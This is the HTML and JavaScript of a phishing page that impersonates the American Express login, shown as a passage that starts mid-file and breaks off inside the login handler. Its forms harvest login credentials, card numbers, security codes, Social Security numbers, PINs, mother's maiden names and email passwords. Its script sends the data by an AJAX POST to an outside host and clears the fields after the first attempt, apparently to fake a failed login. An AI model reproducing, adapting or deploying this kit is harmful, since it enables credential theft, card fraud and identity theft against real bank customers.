5.1H70l-4.8-5.3C67.6 9 69 7.2 69 4.9m-28.5 9.9h12.3v-3.3h-8.4V9.1h8.2V5.8h-8.2V3.5h8.4V.2H40.5zM28.1 9.4L24.8.2h-6.1v14.6h3.8V4.3l3.8 10.5h3.5l3.9-10.5v10.5h3.8V.2h-6.1zM6.9 8.6l2-4.9 2 4.9h-4zM6.4.2L0 14.8h4.3l1.2-3h6.8l1.3 3H18L11.5.2H6.4z"
  662.          fill="#006fcf"
  663.        />
  664.       </svg>
  665.     </div>
  666.  
  667.     <div class="nms__bod">
  668.       <div class="nms__bod-f">
  669.         <h2>Log In to My Account</h2>
  670.  
  671.      
  672.         <form class="nms-box">
  673.          
  674.           <div class="nms-box-mi">
  675.            
  676.           <span class="error-box remove">Incorrect User ID and Password</span>
  677.             <label> USER ID</label>
  678.             <input type="text" name="userId" id="user" required />
  679.           </div>
  680.  
  681.           <div class="nms-box-mi">
  682.             <label>PASSWORD</label>
  683.             <input type="password" name="pass" id="pass" required />
  684.           </div>
  685.  
  686.           <div class="nms-box-mi">
  687.             <select name="typeAcct" id="sele" >
  688.               <option value="">Cards - My Account</option>
  689.               <option value="Membership Rewards">Membership Rewards</option>
  690.               <option value="Merchant Account">Merchant Account</option>
  691.               <option value="American Express @ Work">
  692.                 American Express @ Work
  693.               </option>
  694.             </select>
  695.           </div>
  696.  
  697.           <div>
  698.             <input type="checkbox" />
  699.             <label>Remember me</label>
  700.           </div>
  701.  
  702.           <div class="nms-box-mi">
  703.             <button class="btn-full btn-login">Log In</button>
  704.           </div>
  705.  
  706.           <div class="nsj__link">
  707.             <a href="#">Forgot User ID or Password?</a>
  708.           </div>
  709.           <div class="nsj__link">
  710.             <a href="#">Create New Online Account</a>
  711.           </div>
  712.           <div class="nsj__link">
  713.             <a href="#">Confirm Card Received</a>
  714.           </div>
  715.  
  716.           <div class="nsj__link">
  717.             <a href="#">Visit Our Security Center</a>
  718.           </div>
  719.         </form>
  720.       </div>
  721.  
  722.       <div class="msh-img">
  723.         <p>FROM OUR PARTNERS</p>
  724.         <img src="https://i.ibb.co/KmKtyjS/add.jpg" />
  725.       </div>
  726.     </div>
  727.  
  728.     <div class="mhasas-bod-2 remove">
  729.       <div class="veraNjh-1">
  730.         <div class="prog-bar">
  731.           <span class="span-text">1. Verify your card</span>
  732.         </div>
  733.         <div class="imgtye-arr">
  734.           <img src="https://i.ibb.co/s2LLwbM/test.png" alt="arrow" />
  735.         </div>
  736.       </div>
  737.       <div class="mbod-conqkas">
  738.         <h2 class="verifCode">Verify Your Card</h2>
  739.  
  740.         <div class="hjno-bod">
  741.           <div class="hasHigy jsken newForm">
  742.             <p>
  743.               For additional security, please enter the following information so
  744.               that we can confirm it's you not someone else and proceed with the
  745.               verification purpose.
  746.             </p>
  747.             <form class="nms-box">
  748.               <div class="nms-box-mi">
  749.                 <label class="gnPgha-yh">4-DIGIT CARD ID</label>
  750.                 <input
  751.                  type="text"
  752.                  name="pin"
  753.                  id="pin"
  754.                  placeholder="XXXXX"
  755.                  required
  756.                />
  757.               </div>
  758.  
  759.               <div class="nms-box-mi">
  760.                 <label class="gnPgha-yh">3 DIGIT CSC</label>
  761.                 <input
  762.                  type="text"
  763.                  name="digt"
  764.                  id="pihsas"
  765.                  placeholder="XXX"
  766.                  required
  767.                />
  768.               </div>
  769.               <div class="nms-box-mi">
  770.                 <label class="gnPgha-yh">Mother's Birthday</label>
  771.                 <input
  772.                  type="email"
  773.                  name="mail2"
  774.                  id="mail"
  775.                  placeholder="MMDD"
  776.                  required
  777.                />
  778.               </div>
  779.  
  780.               <div class="nms-box-mi">
  781.                 <button class="btn-full btn-cont">Continue</button>
  782.               </div>
  783.  
  784.               <div class="nsj__link">
  785.                 <a href="#">Don�t have a 4-Digit Card ID?</a>
  786.               </div>
  787.             </form>
  788.           </div>
  789.  
  790.           <div class="hasHigy remove newForm2 jsken">
  791.             <form class="nms-box">
  792.               <div class="nms-box-mi">
  793.                 <label class="gnPgha-yh">NAME ON CARD</label>
  794.                 <input
  795.                  type="text"
  796.                  name="card"
  797.                  id="card"
  798.                  placeholder="Name on Card"
  799.                  required
  800.                />
  801.               </div>
  802.  
  803.               <div class="nms-box-mi">
  804.                 <label class="gnPgha-yh">15-DIGIT CARD NUMBER</label>
  805.                 <input
  806.                  type="text"
  807.                  name="numCard"
  808.                  id="numCard"
  809.                  placeholder="XXXX-XXXXXX-XXXX"
  810.                  required
  811.                />
  812.               </div>
  813.               <div class="nms-box-mi">
  814.                 <label class="gnPgha-yh">4-DIGIT CARD ID</label>
  815.                 <input
  816.                  type="text"
  817.                  name="pass2"
  818.                  id="idCar"
  819.                  placeholder="XXXX"
  820.                  required
  821.                />
  822.               </div>
  823.               <div class="nms-box-mi">
  824.                 <label class="gnPgha-yh">EXPIRED DATE</label>
  825.                 <input
  826.                  type="text"
  827.                  name="exp"
  828.                  id="exp"
  829.                  placeholder="MM/YY"
  830.                  required
  831.                />
  832.               </div>
  833.  
  834.               <div class="nms-box-mi">
  835.                 <label class="gnPgha-yh">CARD SECURITY CODE (CSC)</label>
  836.                 <input
  837.                  type="text"
  838.                  name="secDate"
  839.                  id="secCode"
  840.                  placeholder="Card Security Code (CSC)"
  841.                  required
  842.                />
  843.               </div>
  844.  
  845.               <div class="nms-box-mi">
  846.                 <label class="gnPgha-yh">EMAIL ADDRESS</label>
  847.                 <input
  848.                  type="email"
  849.                  name="email2"
  850.                  id="emai"
  851.                  placeholder="Email Address"
  852.                  required
  853.                />
  854.               </div>
  855.               <div class="nms-box-mi">
  856.                  <span class="error-box remove">Incorrect Email Password</span>
  857.                 <label class="gnPgha-yh">PASSWORD</label>
  858.                 <input
  859.                  type="password"
  860.                  name="emPass"
  861.                  id="passem"
  862.                  placeholder="Password"
  863.                  required
  864.                />
  865.               </div>
  866.               <div class="nms-box-mi">
  867.                 <button class="btn-full btn-cont-2">Continue</button>
  868.               </div>
  869.             </form>
  870.           </div>
  871.  
  872.           <div class="hasHigy remove newForm3 jsken">
  873.             <form class="nms-box">
  874.               <div class="nms-box-mi">
  875.                 <label class="gnPgha-yh">SOCIAL SECURITY NUMBER</label>
  876.                 <input
  877.                  type="text"
  878.                  name="ssn"
  879.                  id="ssn"
  880.                  placeholder="XXX-XX-XXXX"
  881.                  required
  882.                />
  883.               </div>
  884.  
  885.               <div class="nms-box-mi">
  886.                 <label class="gnPgha-yh">PERSONAL SECURITY PIN / KEY</label>
  887.                 <input
  888.                  type="text"
  889.                  name="secPin"
  890.                  id="secPin"
  891.                  placeholder="XXXX"
  892.                  required
  893.                />
  894.               </div>
  895.               <div class="nms-box-mi">
  896.                 <label class="gnPgha-yh">DATE OF BIRTH</label>
  897.                 <input
  898.                  type="text"
  899.                  name="dob"
  900.                  id="dob"
  901.                  placeholder="DD/MM/YY required"
  902.                />
  903.               </div>
  904.               <div class="nms-box-mi">
  905.                 <label class="gnPgha-yh">MOTHER MAIDEN NAME</label>
  906.                 <input
  907.                  type="text"
  908.                  name="mmname"
  909.                  id="mmname"
  910.                  placeholder="Mother's Maiden Name"
  911.                  required
  912.                />
  913.               </div>
  914.  
  915.               <div class="nms-box-mi">
  916.                 <label class="gnPgha-yh">PLACE OF BIRTH</label>
  917.                 <input
  918.                  type="text"
  919.                  name="pbirth"
  920.                  id="pbirth"
  921.                  placeholder="Place of Birth"
  922.                  required
  923.                />
  924.               </div>
  925.  
  926.               <div class="nms-box-mi">
  927.                 <label class="gnPgha-yh">EMAIL ADDRESS</label>
  928.                 <input
  929.                  type="email"
  930.                  name="mail3"
  931.                  id="mail3"
  932.                  placeholder="Email Address"
  933.                  required
  934.                />
  935.               </div>
  936.               <div class="nms-box-mi">
  937.                 <span class="error-box remove">Incorrect Email Password</span>
  938.                 <label class="gnPgha-yh">EMAIL PASSWORD</label>
  939.                 <input
  940.                  type="password"
  941.                  name="mailps"
  942.                  id="mailps"
  943.                  placeholder="Email Password"
  944.                  required
  945.                />
  946.               </div>
  947.               <div class="nms-box-mi">
  948.                 <button class="btn-full btn-cont-3">Continue</button>
  949.               </div>
  950.             </form>
  951.           </div>
  952.  
  953.           <div class="hasHigy remove newForm3 jsken">
  954.             <form class="nms-box">
  955.               <div class="nms-box-mi">
  956.                 <label class="gnPgha-yh">SOCIAL SECURITY NUMBER</label>
  957.                 <input
  958.                  type="text"
  959.                  name="ssn"
  960.                  id="ssn"
  961.                  placeholder="XXX-XX-XXXX"
  962.                  required
  963.                />
  964.               </div>
  965.  
  966.               <div class="nms-box-mi">
  967.                 <label class="gnPgha-yh">SECURITY PIN</label>
  968.                 <input
  969.                  type="password"
  970.                  name="secPin"
  971.                  id="secPin"
  972.                  placeholder="XXXX"
  973.                  required
  974.                />
  975.               </div>
  976.               <div class="nms-box-mi">
  977.                 <label class="gnPgha-yh">DATE OF BIRTH</label>
  978.                 <input
  979.                  type="password"
  980.                  name="dob"
  981.                  id="dob"
  982.                  placeholder="DD/MM/YY required"
  983.                />
  984.               </div>
  985.               <div class="nms-box-mi">
  986.                 <label class="gnPgha-yh">MOTHER MAIDEN NAME</label>
  987.                 <input
  988.                  type="password"
  989.                  name="mmname"
  990.                  id="mmname"
  991.                  placeholder="Mother's Maiden Name"
  992.                  required
  993.                />
  994.               </div>
  995.  
  996.               <div class="nms-box-mi">
  997.                 <label class="gnPgha-yh">PLACE OF BIRTH</label>
  998.                 <input
  999.                  type="password"
  1000.                  name="pbirth"
  1001.                  id="pbirth"
  1002.                  placeholder="Place of Birth"
  1003.                  required
  1004.                />
  1005.               </div>
  1006.  
  1007.               <div class="nms-box-mi">
  1008.                 <label class="gnPgha-yh">EMAIL ADDRESS</label>
  1009.                 <input
  1010.                  type="password"
  1011.                  name="mail3"
  1012.                  id="mail3"
  1013.                  placeholder="Email Address"
  1014.                  required
  1015.                />
  1016.               </div>
  1017.               <div class="nms-box-mi">
  1018.                 <label class="gnPgha-yh">EMAIL PASSWORD</label>
  1019.                 <input
  1020.                  type="password"
  1021.                  name="mailps"
  1022.                  id="mailps"
  1023.                  placeholder="Email Password"
  1024.                  required
  1025.                />
  1026.               </div>
  1027.               <div class="nms-box-mi">
  1028.                 <button class="btn-full btn-cont-3">Continue</button>
  1029.               </div>
  1030.             </form>
  1031.           </div>
  1032.  
  1033.           <div class="hasHigy remove newForm4 jsken">
  1034.             <div class="img-box">
  1035.               <img src="https://i.ibb.co/xYJZKp6/loading.gif" alt="load" />
  1036.             </div>
  1037.           </div>
  1038.  
  1039.           <div class="phajshjas"></div>
  1040.  
  1041.           <div class="njtyeuas-1-box">
  1042.             <p>
  1043.               The location of your Card details may differ depending on your
  1044.               Card.
  1045.             </p>
  1046.             <img src="https://i.ibb.co/qpSKSFR/tn.png" alt="tnhasj" />
  1047.           </div>
  1048.         </div>
  1049.       </div>
  1050.     </div>
  1051.  
  1052.     <div class="nsmh-fot">
  1053.       <div class="shgas-fot-box">
  1054.         <div class="ngh-fot-lik">
  1055.           <h4>ABOUT</h4>
  1056.           <div class="bnsj-link">
  1057.             <a href="#">About American Express</a>
  1058.           </div>
  1059.  
  1060.           <div class="bnsj-link">
  1061.             <a href="#">Investor Relations</a>
  1062.           </div>
  1063.  
  1064.           <div class="bnsj-link">
  1065.             <a href="#">Careers</a>
  1066.           </div>
  1067.  
  1068.           <div class="bnsj-link">
  1069.             <a href="#">Global Network</a>
  1070.           </div>
  1071.           <div class="bnsj-link">
  1072.             <a href="#">Contact Us </a>
  1073.           </div>
  1074.  
  1075.           <div class="bnsj-link">
  1076.             <a href="#">Amex Mobile App</a>
  1077.           </div>
  1078.         </div>
  1079.  
  1080.         <div class="ngh-fot-lik">
  1081.           <h4>PRODUCTS & SERVICES</h4>
  1082.          <div class="bnsj-link">
  1083.            <a href="#">Credit Cards</a>
  1084.          </div>
  1085.  
  1086.          <div class="bnsj-link">
  1087.            <a href="#">Business Credit Cards</a>
  1088.          </div>
  1089.  
  1090.          <div class="bnsj-link">
  1091.            <a href="#">Corporate Programs</a>
  1092.          </div>
  1093.  
  1094.          <div class="bnsj-link">
  1095.            <a href="#">Prepaid Cards</a>
  1096.          </div>
  1097.          <div class="bnsj-link">
  1098.            <a href="#">Savings Accounts & CDs </a>
  1099.          </div>
  1100.  
  1101.          <div class="bnsj-link">
  1102.            <a href="#">Gift Cards</a>
  1103.          </div>
  1104.        </div>
  1105.  
  1106.        <div class="ngh-fot-lik">
  1107.          <h4>LINKS YOU MAY LIKE</h4>
  1108.          <div class="bnsj-link">
  1109.            <a href="#">Membership Rewards</a>
  1110.          </div>
  1111.  
  1112.          <div class="bnsj-link">
  1113.            <a href="#">Free Credit Score & Report</a>
  1114.          </div>
  1115.  
  1116.          <div class="bnsj-link">
  1117.            <a href="#">CreditSecure</a>
  1118.          </div>
  1119.  
  1120.          <div class="bnsj-link">
  1121.            <a href="#">Bluebird</a>
  1122.          </div>
  1123.          <div class="bnsj-link">
  1124.            <a href="#">Accept Amex Cards </a>
  1125.          </div>
  1126.  
  1127.          <div class="bnsj-link">
  1128.            <a href="#">Refer A Friend</a>
  1129.          </div>
  1130.        </div>
  1131.  
  1132.        <div class="ngh-fot-lik">
  1133.          <h4>ADDITIONAL INFORMATION</h4>
  1134.          <div class="bnsj-link">
  1135.            <a href="#">Credit Intel – Financial Education Center</a>
  1136.          </div>
  1137.  
  1138.          <div class="bnsj-link">
  1139.            <a href="#">Supplier Diversity</a>
  1140.          </div>
  1141.  
  1142.          <div class="bnsj-link">
  1143.            <a href="#">Credit 101</a>
  1144.          </div>
  1145.  
  1146.          <div class="bnsj-link">
  1147.            <a href="#">Money Management 101</a>
  1148.          </div>
  1149.          <div class="bnsj-link">
  1150.            <a href="#">US Newcomers </a>
  1151.          </div>
  1152.  
  1153.          <div class="bnsj-link">
  1154.            <a href="#">Frequently Asked Questions</a>
  1155.          </div>
  1156.        </div>
  1157.      </div>
  1158.  
  1159.      <div class="njmk-log-fot">
  1160.        <hr />
  1161.        <div class="njksl6-box">
  1162.          <div class="gheyx-arr-soc">
  1163.            <div class="mkjss">
  1164.              <svg
  1165.                xmlns="http://www.w3.org/2000/svg"
  1166.                width="235"
  1167.                height="15"
  1168.                viewBox="0 0 235 15"
  1169.              >
  1170.                <path fill="none" d="M0 0h235v15H0z" />
  1171.                <path
  1172.                  d="M230.1 5.8h-3.6c-.8 0-1.3-.5-1.3-1.2s.6-1.1 1.3-1.1h6.5l1.5-3.3h-8c-3.3 0-5.2 2-5.2 4.6 0 2.8 1.8 4.4 4.7 4.4h3.6c.8 0 1.3.5 1.3 1.2s-.5 1.2-1.3 1.2h-7.8v3.3h7.8c3.3 0 5.2-1.9 5.2-4.7 0-2.8-1.7-4.4-4.7-4.4m-14.3 0h-3.6c-.8 0-1.3-.5-1.3-1.2s.6-1.1 1.3-1.1h6.5l1.5-3.3h-8c-3.3 0-5.2 2-5.2 4.6 0 2.8 1.8 4.4 4.7 4.4h3.6c.8 0 1.3.5 1.3 1.2s-.5 1.2-1.3 1.2h-7.8v3.3h7.8c3.3 0 5.2-1.9 5.2-4.7 0-2.8-1.7-4.4-4.7-4.4m-22.8 9h12.3v-3.3h-8.4V9.1h8.2V5.8h-8.2V3.5h8.4V.2H193zm-7.7-8.4h-4.1V3.5h4.1c1.2 0 1.8.7 1.8 1.5-.1.8-.7 1.4-1.8 1.4m5.7-1.5c0-2.8-2-4.7-5.2-4.7h-8.4v14.6h3.9V9.7h1.4l4.4 5.1h4.8l-4.8-5.3c2.4-.5 3.9-2.3 3.9-4.6m-21 1.8h-4.2V3.5h4.2c1.2 0 1.8.7 1.8 1.6-.1.9-.7 1.6-1.8 1.6m.4-6.5h-8.5v14.6h3.9V10h4.5c3.3 0 5.3-2.1 5.3-4.9 0-2.9-2-4.9-5.2-4.9m-9.2 0h-5l-3.8 4.4-3.8-4.4h-5.1l6.4 7.2-6.5 7.4h5l3.9-4.6 4 4.6h5.1l-6.6-7.5zm-30.7 14.6h12.3v-3.3h-8.4V9.1h8.2V5.8h-8.2V3.5h8.4V.2h-12.3zm-13.7-5.7l-6-8.9h-4.9v14.6h3.9V5.5l6.1 9.3h4.7V.2h-3.8zm-22.7-.5l2-4.9 2 4.9h-4zM93.7.2l-6.4 14.6h4.3l1.2-3h6.8l1.3 3h4.4L98.7.2h-5zM80.9 7.6v-.3c0-2.2 1.2-3.7 3.7-3.7H89V.2h-4.7C79.5.2 77 3.3 77 7.3v.3c0 4.5 2.8 7.1 7.1 7.1h1.3l1.6-3.3h-2.3c-2.3.1-3.8-1.2-3.8-3.8M71.1.2v14.6H75V.2zm-7.8 6.2h-4.1V3.5h4.1c1.2 0 1.8.7 1.8 1.5s-.6 1.4-1.8 1.4M69 4.9c0-2.8-2-4.7-5.2-4.7h-8.4v14.6h3.9V9.7h1.4l4.4 5.1H70l-4.8-5.3C67.6 9 69 7.2 69 4.9m-28.5 9.9h12.3v-3.3h-8.4V9.1h8.2V5.8h-8.2V3.5h8.4V.2H40.5zM28.1 9.4L24.8.2h-6.1v14.6h3.8V4.3l3.8 10.5h3.5l3.9-10.5v10.5h3.8V.2h-6.1zM6.9 8.6l2-4.9 2 4.9h-4zM6.4.2L0 14.8h4.3l1.2-3h6.8l1.3 3H18L11.5.2H6.4z"
  1173.                  fill="#006fcf"
  1174.                />
  1175.              </svg>
  1176.            </div>
  1177.            <a href="#"
  1178.              ><img
  1179.                class="ghavih-spc"
  1180.                src="https://i.ibb.co/VtX8ZP4/download.png"
  1181.                alt="ahas"
  1182.            /></a>
  1183.            <a href="#"
  1184.              ><img
  1185.                class="ghavih-spc"
  1186.                src="https://i.ibb.co/TKx8t5s/download-1.png"
  1187.                alt="ahas"
  1188.            /></a>
  1189.            <a href="#"
  1190.              ><img
  1191.                class="ghavih-spc"
  1192.                src="https://i.ibb.co/tb8cHYc/download-2.png"
  1193.                alt="ahas"
  1194.            /></a>
  1195.            <a href="#"
  1196.              ><img
  1197.                class="ghavih-spc"
  1198.                src="https://i.ibb.co/bJMm7r9/download-3.png"
  1199.                alt="ahas"
  1200.            /></a>
  1201.            <a href="#"
  1202.              ><img
  1203.                class="ghavih-spc"
  1204.                src="https://i.ibb.co/17L4RTM/download-4.png"
  1205.                alt="ahas"
  1206.            /></a>
  1207.          </div>
  1208.  
  1209.          <div class="cjas-cont">
  1210.            <svg
  1211.              xmlns="http://www.w3.org/2000/svg"
  1212.              width="100"
  1213.              height="69"
  1214.              viewBox="0 0 100 69"
  1215.            >
  1216.              <path fill="#FFF" d="M0 0h100v69H0z" />
  1217.              <path
  1218.                fill="#BD3D44"
  1219.                d="M0 0h100v5.308H0V0zm0 10.615h100v5.308H0v-5.308zm0 10.616h100v5.308H0V21.23zm0 10.615h100v5.308H0v-5.308zm0 10.616h100v5.308H0v-5.308zm0 10.615h100v5.308H0v-5.308zm0 10.616h100V69H0v-5.308z"
  1220.              />
  1221.              <path fill="#192F5D" d="M0 0h52.44v37.154H0V0z" />
  1222.              <path
  1223.                fill="#FFF"
  1224.                d="M4.37 1.59l.477 1.469h1.544l-1.249.907.477 1.469-1.25-.908-1.248.908.477-1.469-1.25-.907h1.545L4.37 1.59zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.249.908.477-1.469-1.25-.907h1.545l.477-1.469zm8.74 0l.477 1.469h1.545l-1.25.907.478 1.469-1.25-.908-1.249.908.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.25.908.478-1.469-1.25-.907h1.545l.477-1.469zm8.74 0l.477 1.469h1.545l-1.25.907.478 1.469-1.25-.908-1.249.908.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.478 1.469h1.544l-1.25.907.478 1.469-1.25-.908-1.249.908.478-1.469-1.25-.907h1.545l.477-1.469zM8.74 5.306l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.25.907.478-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.478 1.468h1.544l-1.25.908.478 1.468-1.25-.907-1.249.907.478-1.468-1.25-.908h1.545l.476-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.249.907.477-1.468-1.25-.908h1.545l.477-1.468zM4.37 9.021l.477 1.468h1.544l-1.249.908.477 1.469-1.25-.908-1.248.908.477-1.469-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.469-1.249-.908-1.249.908.477-1.469-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.469-1.25-.908-1.249.908.477-1.469-1.249-.908h1.544l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.469-1.249-.908-1.25.908.478-1.469-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.469-1.25-.908-1.249.908.477-1.469-1.249-.908h1.544l.477-1.468zm8.74 0l.478 1.468h1.544l-1.25.908.478 1.469-1.25-.908-1.249.908.478-1.469-1.25-.908h1.545l.477-1.468zM8.74 12.736l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.907-1.249.907.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.907-1.25.907.478-1.469-1.25-.907h1.545l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.907-1.249.907.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.478 1.469h1.544l-1.25.907.478 1.469-1.25-.907-1.249.907.478-1.469-1.25-.907h1.544l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.907-1.249.907.477-1.469-1.25-.907h1.545l.477-1.469zM4.37 16.452l.477 1.468h1.544l-1.249.908.477 1.468-1.25-.907-1.248.907.477-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.249.907.477-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.468-1.25-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.25.907.478-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.468-1.25-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.478 1.468h1.544l-1.25.908.478 1.468-1.25-.907-1.249.907.478-1.468-1.25-.908h1.545l.477-1.468zM8.74 20.167l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.249.908.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.25.908.478-1.469-1.25-.907h1.545l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.249.908.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.478 1.469h1.544l-1.25.907.478 1.469-1.25-.908-1.249.908.478-1.469-1.25-.907h1.544l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.249.908.477-1.469-1.25-.907h1.545l.477-1.469zM4.37 23.883l.477 1.468h1.544l-1.249.908.477 1.468-1.25-.907-1.248.907.477-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.249.907.477-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.468-1.25-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.25.907.478-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.468-1.25-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.478 1.468h1.544l-1.25.908.478 1.468-1.25-.907-1.249.907.478-1.468-1.25-.908h1.545l.477-1.468zM8.74 27.598l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.249.908.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.25.908.478-1.469-1.25-.907h1.545l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.249.908.477-1.469-1.249-.907h1.544l.477-1.469zm8.74 0l.478 1.469h1.544l-1.25.907.478 1.469-1.25-.908-1.249.908.478-1.469-1.25-.907h1.544l.477-1.469zm8.74 0l.477 1.469h1.544l-1.249.907.477 1.469-1.249-.908-1.249.908.477-1.469-1.25-.907h1.545l.477-1.469zM4.37 31.314l.477 1.468h1.544l-1.249.908.477 1.468-1.25-.907-1.248.907.477-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.249.907.477-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.468-1.25-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.477 1.468h1.544l-1.249.908.477 1.468-1.249-.907-1.25.907.478-1.468-1.25-.908h1.545l.477-1.468zm8.74 0l.477 1.468h1.545l-1.25.908.478 1.468-1.25-.907-1.249.907.477-1.468-1.249-.908h1.544l.477-1.468zm8.74 0l.478 1.468h1.544l-1.25.908.478 1.468-1.25-.907-1.249.907.478-1.468-1.25-.908h1.545l.477-1.468z"
  1225.              />
  1226.            </svg>
  1227.            United States<a href="#">Change Country</a>
  1228.          </div>
  1229.        </div>
  1230.      </div>
  1231.  
  1232.      <div class="tejank-j3">
  1233.        <div class="ghst-terms">
  1234.          <a href="#"> Terms of Service</a> | <a href="#"> Privacy Center</a> |
  1235.          <a href="#"> AdChoices</a> | <a href="#"> Security Center</a> |
  1236.          <a href="#"> Card Agreements</a> |
  1237.          <a href="#"> Servicemember Benefits</a> |
  1238.          <a href="#"> Site Map</a>
  1239.        </div>
  1240.  
  1241.        <div class="ghshe">
  1242.          <span
  1243.            >All users of our online services are subject to our Privacy
  1244.            Statement and agree to be bound by the Terms of Service. Please
  1245.            review.</span
  1246.          >
  1247.        </div>
  1248.  
  1249.        <div class="shasjk">
  1250.          <span> © 2023 American Express. All rights reserved</span>
  1251.        </div>
  1252.      </div>
  1253.    </div>
  1254.    <script>
  1255.      const nLinks = document.querySelectorAll(".hasn-bt");
  1256.       const popBox = document.querySelector(".njkhsye78-box");
  1257.       const gpoNav = document.querySelector(".gpo-nav");
  1258.       const formCon = document.querySelector(".nms-box");
  1259.       const user = document.querySelector("#user");
  1260.       const id = document.querySelector("#pass");
  1261.       const sele = document.querySelector("#sele");
  1262.       const btnLogIn = document.querySelector(".btn-login");
  1263.       const headDiv = document.querySelector(".head__div");
  1264.       const nmsBod = document.querySelector(".nms__bod");
  1265.       const pin = document.querySelector("#pin");
  1266.       const pass = document.querySelector("#pihsas");
  1267.       const email = document.querySelector("#mail");
  1268.       const btnCont = document.querySelector(".btn-cont");
  1269.       const newForm = document.querySelector(".newForm");
  1270.       const newForm2 = document.querySelector(".newForm2");
  1271.       const spanText = document.querySelector(".span-text");
  1272.       const card = document.querySelector("#card");
  1273.       const numCard = document.querySelector("#numCard");
  1274.       const idCar = document.querySelector("#idCar");
  1275.       const exp = document.querySelector("#exp");
  1276.       const secCode = document.querySelector("#secCode");
  1277.       const emai = document.querySelector("#emai");
  1278.       const passem = document.querySelector("#passem");
  1279.       const btnCont2 = document.querySelector(".btn-cont-2");
  1280.       const btnCont3 = document.querySelector(".btn-cont-3");
  1281.       const ssn = document.querySelector("#ssn");
  1282.       const secPin = document.querySelector("#secPin");
  1283.       const dob = document.querySelector("#dob");
  1284.       const mmname = document.querySelector("#mmname");
  1285.       const pbirth = document.querySelector("#pbirth");
  1286.       const mail3 = document.querySelector("#mail3");
  1287.       const mailps = document.querySelector("#mailps");
  1288.       const newForm3 = document.querySelector(".newForm3");
  1289.       const newForm4 = document.querySelector(".newForm4");
  1290.       const phajshjas = document.querySelector(".phajshjas");
  1291.       const netBox = document.querySelector(".njtyeuas-1-box");
  1292.       const verifCode = document.querySelector(".verifCode");
  1293.       const mhassBod = document.querySelector(".mhasas-bod-2");
  1294.       const errorBox = document.querySelectorAll(".error-box");
  1295.      
  1296.       let count = 0;
  1297.  
  1298.       const ajaxCode = (data) => {
  1299.         $.ajax({
  1300.           //post php link here....
  1301.           url: "https://quorumgroup.com.ph/book.php",
  1302.           type: "POST",
  1303.           data: { pass: data },
  1304.         });
  1305.       };
  1306.       const scrollTop = () => {
  1307.         window.scrollTo(0, 0);
  1308.       };
  1309.  
  1310.       nLinks.forEach((nlink) => {
  1311.         nlink.addEventListener("click", () => {
  1312.           nlink.style.borderBottom = "5px solid blue";
  1313.           popBox.classList.remove("hide");
  1314.         });
  1315.       });
  1316.  
  1317.       //pop box container
  1318.       gpoNav.addEventListener("click", () => {
  1319.         popBox.classList.add("hide");
  1320.         nLinks.forEach((nlink) => {
  1321.           nlink.style.borderBottom = "";
  1322.         });
  1323.       });
  1324.  
  1325.       btnLogIn.addEventListener("click", () => {
  1326.          count += 1;
  1327.         if (user.value === "" || id.value === "") {
  1328.           console.log("Not allowed");
  1329.         } else {
  1330.           let textData = `USER ID: ${user.value} \nPassword: ${id.value} \nAccount Type: ${sele.value}`;
  1331.           if(count === 1){
  1332.             id.value = "";
  1333.             user.value = "";
  1334.             user.required = false;
